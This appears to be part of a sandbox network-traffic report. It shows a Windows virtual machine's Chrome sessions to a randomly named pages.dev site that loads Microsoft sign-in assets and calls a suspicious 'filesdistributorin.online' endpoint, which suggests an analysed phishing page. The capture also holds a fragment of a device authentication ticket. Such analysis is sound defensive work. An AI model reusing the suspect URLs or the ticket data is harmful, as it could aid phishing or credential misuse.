2024-08-31 22:54:39 UTC	14383	IN	Data Raw: ca 4a aa 8f 9e 3f 44 bb c2 f2 55 2f 0c 14 68 fc 08 52 d1 57 95 41 8a 97 a9 b0 84 ad 16 07 e3 d7 b9 1c c1 4c b2 63 d4 1b d3 76 63 58 62 a1 b1 23 27 83 0f 44 5c 25 8d 29 14 6a 3f 7c 59 b7 2a 7d 1a 15 e0 97 2e 1f 47 d8 d2 1b c6 06 83 0a 3a 4b cc d5 a4 27 ec ab 39 79 df 99 75 ac 50 e3 5c 7d 7f b5 02 ed 51 c0 70 8d 16 a5 b1 cd ce 1d 18 56 e3 dc 17 87 2e ee 5d a8 cb 3e cd 9c e1 68 f8 50 a3 79 80 05 c9 55 59 96 ab 75 64 64 5e 5e f1 12 9a 1c 37 29 51 67 0d ff 84 92 c1 a0 7c 8d 68 c8 ea 25 cc b3 17 57 41 e0 ac 21 81 d2 eb 18 36 c8 c7 64 56 50 35 f9 80 a7 12 53 9b d0 c4 12 6f 9a a4 b7 dd 2c 0a 85 a2 4a 27 3a 38 e3 8c 25 4f f0 60 1b 0e da 18 e4 09 4c 81 f4 f5 0f 3d 04 fe ae 52 57 60 9a 00 23 0c 26 ba 50 b0 81 61 28 65 44 56 7a 3e c5 61 ce 7a a0 ec 52 c7 82 4a d1 b5 Data Ascii: J?DU/hRWALcvcXb#'D\%)j?\|Y*}.G:K'9yuP\}QpV.]>hPyUYudd^^7)Qg\|h%WA!6dVP5So,J':8%O`L=RW`#&Pa(eDVz>azRJ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	49736	35.190.80.1	443	2732	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 22:54:39 UTC	652	OUT	OPTIONS /report/v4?s=QcBOsfsYs8PeYUCrKZ2Y9gYZGlIy2rfxNsPqrvrhLDPYQVwXL7h7QpSUTdFShD9ScIbhUZ%2B2yLOTDGIi2rnUall0A8LAMTfpMtaktOvzCYw0x0BvbR9TuUjPW1iBtEvb7H9nsVRO6RAlpW94Q8BS9VvltZt7k9U7r%2BDoFZ1QxvsNf9qAgTXs0y9rWXMDONa8WSAjQjpp HTTP/1.1 Host: a.nel.cloudflare.com Connection: keep-alive Origin: https://palisades-observatory-3aea66138e00e57e9f-5677ed4549f19c25.pages.dev Access-Control-Request-Method: POST Access-Control-Request-Headers: content-type User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-31 22:54:39 UTC	336	IN	HTTP/1.1 200 OK Content-Length: 0 access-control-max-age: 86400 access-control-allow-methods: POST, OPTIONS access-control-allow-origin: * access-control-allow-headers: content-type, content-length date: Sat, 31 Aug 2024 22:54:39 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
15	192.168.2.6	49737	40.113.103.199	443

Timestamp	Bytes transferred	Direction	Data
2024-08-31 22:54:40 UTC	70	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 34 0d 0a 4d 53 2d 43 56 3a 20 68 6b 56 39 6d 73 76 30 75 45 32 74 70 78 4a 5a 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 61 31 34 33 62 34 30 38 33 30 38 31 61 35 0d 0a 0d 0a Data Ascii: CNT 1 CON 304MS-CV: hkV9msv0uE2tpxJZ.1Context: 3a143b4083081a5
2024-08-31 22:54:40 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-08-31 22:54:40 UTC	1083	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 30 0d 0a 4d 53 2d 43 56 3a 20 68 6b 56 39 6d 73 76 30 75 45 32 74 70 78 4a 5a 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 61 31 34 33 62 34 30 38 33 30 38 31 61 35 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 57 37 42 6f 6e 47 4e 65 45 4c 64 79 76 63 53 63 65 6e 48 56 42 2b 64 68 69 48 69 31 36 4f 43 45 66 54 71 33 4e 58 31 55 54 72 4c 71 65 34 76 79 79 52 76 41 4c 75 54 53 39 69 2f 65 67 41 2f 2b 63 32 33 6f 6f 4d 71 6a 47 55 4c 43 68 2b 4f 39 68 70 52 73 47 6c 32 48 56 6f 65 79 6a 79 6e 37 32 71 66 66 70 36 56 57 7a 64 66 31 46 48 Data Ascii: ATH 2 CON\DEVICE 1060MS-CV: hkV9msv0uE2tpxJZ.2Context: 3a143b4083081a5<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAW7BonGNeELdyvcScenHVB+dhiHi16OCEfTq3NX1UTrLqe4vyyRvALuTS9i/egA/+c23ooMqjGULCh+O9hpRsGl2HVoeyjyn72qffp6VWzdf1FH
2024-08-31 22:54:40 UTC	217	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 36 0d 0a 4d 53 2d 43 56 3a 20 68 6b 56 39 6d 73 76 30 75 45 32 74 70 78 4a 5a 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 61 31 34 33 62 34 30 38 33 30 38 31 61 35 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 196MS-CV: hkV9msv0uE2tpxJZ.3Context: 3a143b4083081a5<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-08-31 22:54:40 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-08-31 22:54:40 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 64 33 2b 6b 6d 73 69 62 77 45 43 72 50 6e 34 41 79 33 62 38 2b 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: d3+kmsibwECrPn4Ay3b8+Q.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.6	49738	13.107.246.44	443	2732	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 22:54:40 UTC	655	OUT	GET /ests/2.1/content/cdnbundles/converged.v2.login.min_wixdbz3ubznoegxpcgkfog2.css HTTP/1.1 Host: aadcdn.msauth.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Origin: https://palisades-observatory-3aea66138e00e57e9f-5677ed4549f19c25.pages.dev sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: style Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-31 22:54:40 UTC	803	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 22:54:40 GMT Content-Type: text/css Content-Length: 19750 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Tue, 18 Aug 2020 21:44:27 GMT ETag: 0x8D843BFE1586E6F x-ms-request-id: ddb9d31f-f01e-0031-45f5-fa1de8000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240831T225440Z-16579567576c4hpgz3uh2pbn5g00000005f000000000cgxe x-fd-int-roxy-purgeid: 0 X-Cache-Info: L2_T2 X-Cache: TCP_REMOTE_HIT Accept-Ranges: bytes
2024-08-31 22:54:40 UTC	15581	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed 7d 6b 93 db 36 b2 e8 77 ff 0a ee a4 5c f1 64 25 45 a4 9e a3 a9 b8 d6 71 9c 64 ce f1 ab 6c 67 1f 95 72 6d 71 24 ce 88 c7 94 a8 4b 52 33 9e d5 d1 7f bf 78 a3 01 34 20 6a 3c d9 ec bd 95 f5 c6 16 d1 8d 06 d0 dd 68 a0 01 34 f0 ed 37 7f 8a 9e 97 9b bb 2a bf 5e 36 d1 93 e7 a7 d1 ab 7c 5e 95 75 79 d5 90 f4 6a 53 56 69 93 97 eb 5e f4 ac 28 22 86 54 47 55 56 67 d5 4d b6 e8 45 df 7c fb ed 37 7f 7a d4 6d ff bf e8 fd 87 67 ef 3e 44 6f 7e 8c 3e fc 7c f1 ee 87 e8 2d f9 fa 47 f4 fa cd 87 8b e7 2f a2 d6 54 1e 3d fa b0 cc eb e8 2a 2f b2 88 fc 7b 99 d6 d9 22 2a d7 51 59 45 f9 7a 2e 6a 9d d5 d1 8a fc 5d e5 69 11 5d 55 e5 2a 6a 96 59 b4 a9 ca ff c9 e6 a4 0d 45 5e 37 24 d3 65 56 94 b7 d1 13 42 ae 5a 44 6f d3 aa b9 8b 2e de 9e f6 a2 0f 04 b7 24 Data Ascii: }k6w\d%Eqdlgrmq$KR3x4 j<h47^6\|^uyjSVi^("TGUVgME\|7zmg>Do~>\|-G/T=/{"QYEz.j]i]UjYE^7$eVBZDo.$
2024-08-31 22:54:40 UTC	4169	IN	Data Raw: 34 96 1c e9 f6 7f 5e 64 d5 86 de cb da a5 82 f7 be 54 ee ee a8 47 74 05 33 02 9b 09 b3 09 4d e8 32 18 f8 db 2d e4 a8 85 f7 61 d2 91 ff 09 c6 5a d4 9e 86 ee 80 45 90 dd fb 5e 75 24 92 8a e5 10 d7 5d c8 29 01 76 3f b1 1d da 65 3d 7b e2 3e 47 29 b2 c8 8d fc 0a dc 3f aa 52 2c 1c ba d9 7f c4 61 0e 4a d2 f0 e6 cd 2e d3 d7 a1 0e 76 d3 cd 95 68 ce 7f b1 17 11 38 4d d7 85 5b 49 22 d4 92 8b 5c 05 44 b0 c7 08 68 80 57 3e ff 74 ba 13 51 b7 e2 61 1b 1f da 97 f6 65 b3 fe de 52 be b4 5b fa 8a 89 7a 72 17 d5 d9 bf 6a 15 0c ee 12 f2 ee 29 81 bd 47 aa b9 ec 11 26 61 7d 07 26 25 63 6f 92 07 0b 9a 92 12 28 d6 23 89 74 10 8d 16 69 bd cc 16 51 6c 8d 46 a6 1d 74 0d aa 45 f9 d7 aa 2c b2 ef e8 83 87 f4 dd ca 8f d6 69 28 6b 11 ca ca eb 9c 7a f9 33 ec 20 c6 59 29 ca 07 23 d0 cc ba Data Ascii: 4^dTGt3M2-aZE^u$])v?e={>G)?R,aJ.vh8M[I"\DhW>tQaeR[zrj)G&a}&%co(#tiQlFtE,i(kz3 Y)#

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.6	49741	162.254.39.141	443	2732	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 22:54:40 UTC	373	OUT	GET /ready-page.php HTTP/1.1 Host: basicplan.filesdistributorin.online Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-31 22:54:40 UTC	274	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 x-powered-by: PHP/8.0.30 access-control-allow-origin: * content-type: text/html; charset=UTF-8 content-length: 0 date: Sat, 31 Aug 2024 22:54:40 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.6	49742	35.190.80.1	443	2732	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 22:54:40 UTC	542	OUT	POST /report/v4?s=QcBOsfsYs8PeYUCrKZ2Y9gYZGlIy2rfxNsPqrvrhLDPYQVwXL7h7QpSUTdFShD9ScIbhUZ%2B2yLOTDGIi2rnUall0A8LAMTfpMtaktOvzCYw0x0BvbR9TuUjPW1iBtEvb7H9nsVRO6RAlpW94Q8BS9VvltZt7k9U7r%2BDoFZ1QxvsNf9qAgTXs0y9rWXMDONa8WSAjQjpp HTTP/1.1 Host: a.nel.cloudflare.com Connection: keep-alive Content-Length: 658 Content-Type: application/reports+json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-31 22:54:40 UTC	658	OUT	Data Raw: 5b 7b 22 61 67 65 22 3a 32 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 36 32 33 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 70 61 6c 69 73 61 64 65 73 2d 6f 62 73 65 72 76 61 74 6f 72 79 2d 33 61 65 61 36 36 31 33 38 65 30 30 65 35 37 65 39 66 2d 35 36 37 37 65 64 34 35 34 39 66 31 39 63 32 35 2e 70 61 67 65 73 2e 64 65 76 2f 38 39 30 66 35 65 34 32 31 39 31 32 64 38 33 30 38 36 65 35 64 63 63 32 2f 38 36 62 31 64 39 39 34 33 62 38 63 31 38 34 32 30 31 35 33 65 37 2f 3f 63 36 39 72 31 35 33 3d 69 74 71 66 38 30 6e 26 38 6c 73 31 74 33 Data Ascii: [{"age":2,"body":{"elapsed_time":623,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://palisades-observatory-3aea66138e00e57e9f-5677ed4549f19c25.pages.dev/890f5e421912d83086e5dcc2/86b1d9943b8c18420153e7/?c69r153=itqf80n&8ls1t3
2024-08-31 22:54:40 UTC	168	IN	HTTP/1.1 200 OK Content-Length: 0 date: Sat, 31 Aug 2024 22:54:40 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.6	49744	13.107.246.44	443	2732	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 22:54:41 UTC	617	OUT	GET /shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1 Host: aadcdn.msauth.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-31 22:54:41 UTC	806	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 22:54:41 GMT Content-Type: image/svg+xml Content-Length: 673 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Wed, 12 Feb 2020 22:01:30 GMT ETag: 0x8D7B0071D86E386 x-ms-request-id: 0fc53578-d01e-0078-05f5-fa60ae000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240831T225441Z-165795675762gt5gbs4b9bazh800000005cg0000000032uq x-fd-int-roxy-purgeid: 0 X-Cache-Info: L2_T2 X-Cache: TCP_REMOTE_HIT Accept-Ranges: bytes
2024-08-31 22:54:41 UTC	673	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 b5 55 db 6e db 30 0c fd 15 c1 7d 69 1e ac 50 b2 ae 43 1c a0 37 6c 2f c3 0a 64 fd 80 d4 b1 13 03 ae 1d d8 6e d3 f6 eb 47 ca f6 96 0c 79 6c 10 20 e6 91 45 f2 f0 98 94 16 dd db 96 bd bf 54 75 97 46 bb be df 7f 9b cf 0f 87 03 3f 24 bc 69 b7 73 09 00 73 dc 11 b1 43 b9 e9 77 69 24 bc 84 88 ed f2 72 bb eb 11 81 43 54 94 55 95 46 75 53 e7 d1 72 b1 65 cd 7e 9d 95 fd 47 1a 71 19 b1 ac 2a f7 f1 7e 4d ae af 6d 75 7d f5 30 c3 3d 84 d9 26 8d 7e 0a 65 0c 57 4c 58 af b9 cc bc 06 9e 58 06 88 25 70 17 1b 69 b9 96 13 12 0a 04 37 2b a9 84 e1 d6 c6 02 c0 b1 c1 3f d8 b1 d4 0a cd c4 01 57 4e 0e 88 25 3e e1 a6 b3 16 d7 24 ed a6 08 63 bc 11 7d 4e f4 03 bb 9b 59 34 3f a2 97 78 c5 31 bf 13 9a 9b cc 2a c3 b5 23 76 89 16 c8 47 61 6c 39 01 21 02 39 81 41 Data Ascii: Un0}iPC7l/dnGyl ETuF?$issCwi$rCTUFuSre~Gq~Mmu}0=&~eWLXX%pi7+?WN%>$c}NY4?x1#vGal9!9A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.6	49743	13.107.246.44	443	2732	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 22:54:41 UTC	618	OUT	GET /shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1 Host: aadcdn.msauth.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-31 22:54:41 UTC	807	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 22:54:41 GMT Content-Type: image/svg+xml Content-Length: 1435 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Fri, 17 Jan 2020 19:28:38 GMT ETag: 0x8D79B8373CB2849 x-ms-request-id: bbfc3873-c01e-0048-568d-f9e1cc000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240831T225441Z-16579567576l8zffr7mt4xy2un0000000590000000003y55 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L2_T2 X-Cache: TCP_REMOTE_HIT Accept-Ranges: bytes
2024-08-31 22:54:41 UTC	1435	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 bd 57 4d 6f 1c 37 0c fd 2b 8b ed 75 56 96 48 4a a2 0a db 80 7b f2 c1 be fa 90 db b6 b1 b3 06 ec 26 88 17 76 fa ef fb 28 51 b3 46 91 a2 c9 a5 b0 f7 61 57 1c 51 fc 7c e2 9c bf bc 7e da 7c 7b 7e fa f3 e5 62 7b 38 1e bf fc 7a 76 f6 f6 f6 16 de 38 7c fe fa e9 8c 62 8c 67 78 62 bb 79 7b fc 78 3c 5c 6c 53 d4 ed e6 70 ff f8 e9 70 bc d8 92 6c 37 af 8f f7 6f bf 7d fe 76 b1 8d 9b b8 81 74 83 c5 cb f3 e3 e3 f1 e9 fe 72 ff f2 72 7f 7c 39 3f 1b bf ce bf ec 8f 87 cd c7 8b ed ad 48 50 2e 8b 84 72 97 34 c8 61 47 41 ee 6a c8 ca d7 82 af 37 ac 21 a5 b6 98 ec 9a 4b c8 9c 6e 98 42 12 5a fa 43 87 5d 88 d4 fa d6 6b 6a a1 dd 41 d1 81 83 70 b9 e1 1a 78 49 a6 fe 10 62 d6 1b 49 21 4b b6 93 3e 3c d3 92 42 94 b6 4f 81 8a 2e 03 23 fe d2 12 24 b5 5d 68 a5 Data Ascii: WMo7+uVHJ{&v(QFaWQ\|~\|{~b{8zv8\|bgxby{x<\lSppl7o}vtrr\|9?HP.r4aGAj7!KnBZC]kjApxIbI!K><BO.#$]h

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.6	49748	13.107.246.44	443	2732	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 22:54:41 UTC	612	OUT	GET /shared/1.0/content/images/ellipsis_635a63d500a92a0b8497cdc58d0f66b1.svg HTTP/1.1 Host: aadcdn.msauth.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-31 22:54:41 UTC	806	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 22:54:41 GMT Content-Type: image/svg+xml Content-Length: 252 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Fri, 17 Jan 2020 19:28:37 GMT ETag: 0x8D79B83739D7D79 x-ms-request-id: 19d6d938-f01e-0053-38f5-fadfcf000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240831T225441Z-16579567576qxwrndb60my3nes00000005eg00000000f6m4 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L2_T2 X-Cache: TCP_REMOTE_HIT Accept-Ranges: bytes
2024-08-31 22:54:41 UTC	252	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 e5 53 cb aa c3 20 10 fd 15 71 ed 63 6c ac 26 c5 04 da 7d 7f e0 ee 02 0d 31 d0 17 55 6a 3f bf 6a 52 b8 e5 26 9b bb e9 a2 a8 87 d1 f1 38 e7 0c 68 dc bd 47 8f d3 f1 ec 6a 6c bd bf 6e 38 0f 21 b0 50 b0 cb ad e7 2b 00 e0 f1 06 46 61 38 78 5b 63 a1 30 b2 dd d0 5b 3f c6 f7 a1 0b bb cb a3 c6 80 00 09 15 27 6e 8c 1f fc b1 6b 5a e7 3a ef 0c 1f 77 e6 da 7a 8b 0e 35 de 0b 26 64 41 14 2b d7 ba 8d 31 68 32 22 c4 21 08 93 52 31 28 ab 74 a8 e4 84 53 4a 81 4e 2b 1f 8a 09 c7 14 10 56 56 c5 5f 0e fd cd 79 af 44 5f 95 b6 33 22 34 a9 18 ac 65 3b ff 20 5d 52 41 93 8a ed 8c 72 1d fd 56 52 2d f8 a5 49 c6 be fc 44 4f de 39 59 7f 0a fe 61 7b 41 5c 26 cd b4 78 72 7b ca 48 e0 4b 5c 0b 99 ed 66 d3 3f 98 37 26 7d ae e6 09 a7 d4 d5 8c 84 03 00 00 Data Ascii: S qcl&}1Uj?jR&8hGjln8!P+Fa8x[c0[?'nkZ:wz5&dA+1h2"!R1(tSJN+VV_yD_3"4e; ]RArVR-IDO9Ya{A\&xr{HK\f?7&}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.6	49746	13.107.246.44	443	2732	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 22:54:41 UTC	617	OUT	GET /shared/1.0/content/images/ellipsis_grey_2b5d393db04a5e6e1f739cb266e65b4c.svg HTTP/1.1 Host: aadcdn.msauth.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-31 22:54:41 UTC	806	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 22:54:41 GMT Content-Type: image/svg+xml Content-Length: 263 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Fri, 17 Jan 2020 19:28:37 GMT ETag: 0x8D79B83737D1C56 x-ms-request-id: 0e0acc6e-901e-0008-4ff5-fae6f4000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240831T225441Z-16579567576rhxz5kgqdm3tfq000000005pg0000000064sh x-fd-int-roxy-purgeid: 0 X-Cache-Info: L2_T2 X-Cache: TCP_REMOTE_HIT Accept-Ranges: bytes
